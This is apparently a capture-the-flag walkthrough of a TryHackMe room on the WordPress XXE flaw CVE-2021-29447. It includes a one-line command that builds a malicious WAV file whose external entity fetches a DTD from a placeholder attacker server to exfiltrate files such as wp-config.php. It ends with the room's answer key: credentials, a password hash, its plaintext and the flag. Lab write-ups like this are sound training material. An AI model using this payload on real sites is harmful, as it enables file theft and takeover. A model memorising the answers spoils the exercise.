We covered a wordpress XXE vulnerability CVE-2021-29447 that allows for sensitive files disclosure and server-side request forgery (SSRF). We exploited this WordPress vulnerability by generating WAV payload and uploading it to the compromised WordPress website. This was part of TryHackMe WordPress: CVE-2021-29447 Room.
Splunk SIEM Full Course with Practical Scenarios
What is XXE vulnerability
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
WordPress CVE-2021-29447 Impact
- Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
- Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
Identifying the Vulnerability
The attacker uses WPScan to enumerate the WordPress installation and its plugins, discovering the WordPress version 5.6.2 which is vulnerable to CVE-2021-29447.The vulnerability specifically affects WordPress installations running PHP 8.
Exploiting the Vulnerability
After gaining low-privileged access to the WordPress admin panel, the attacker prepares an XML-based payload for the exploitation.The payload is crafted in a WAV file (payload.wav), which includes an XML external entity (XXE) to access the web server and retrieve sensitive data.
Creating The Payload
You can create a WAV payload using the the commands shown below
nano poc.wav
# create a wav file
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
# paste the payload using echo, change the ip and port to match yours
References
- WordPress 5.7 – ‘Media Library’ XML External Entity Injection (XXE) (Authenticated): Exploit-DB
- WordPress 5.6-5.7 – Authenticated (Author+) XXE (CVE-2021-29447): Github
- WordPress 5.6-5.7 – Authenticated XXE Within the Media Library Affecting PHP 8: wpscan
Uploading the Payload
The attacker uploads the crafted payload.wav file to the WordPress media library. WordPress processes the XML file and requests a second file (proof_of_concept.dtd) from the attacker’s server. This second file triggers the SSRF attack, retrieving sensitive files like /etc/passwd.
A local web server is set up to host the second file (proof_of_concept.dtd) which the WordPress server fetches. The attacker monitors the web server logs to see when WordPress accesses the file and retrieves the data.
Retrieving and Decoding Data
The data returned by the WordPress server is Base64-encoded and zlib-compressed. The attacker uses a PHP script to decode the Base64 string and decompress the data, revealing sensitive information, such as the contents of wp-config.php.
Accessing the Database
Using the credentials retrieved from the wp-config.php file, the attacker logs into the MySQL database. They list the databases, select the WordPress database, and dump the contents of the wp_users table.The attacker’s goal is to retrieve the admin password hash and crack it to gain full administrative control over the WordPress site.
Cracking the Admin Hash
The password hash is cracked using a tool like John the Ripper, enabling the attacker to log in as the WordPress admin.
CVE-2021-29447 TryHackMe | Room Answers
Based on the results of #1, what is the name of the database for WordPress?
wordpressdb2
Based on the results of #1, what are the credentials you found?
example: user:password
thedarktangent:sUp3rS3cret132
Enumerate and identify what is the dbms installed on the server?
MySQL
Based on the results of #4, what is the dbms version installed on the server?
5.7.33
Based on the results of #4, what port is the dbms running on?
3306
Compromise the dbms, What is the encrypted password located in the wordpress users table with id 1??
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
Based on the results of #7, What is the password in plaint text?
teddybear
Compromise the machine and locate flag.txt
thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}
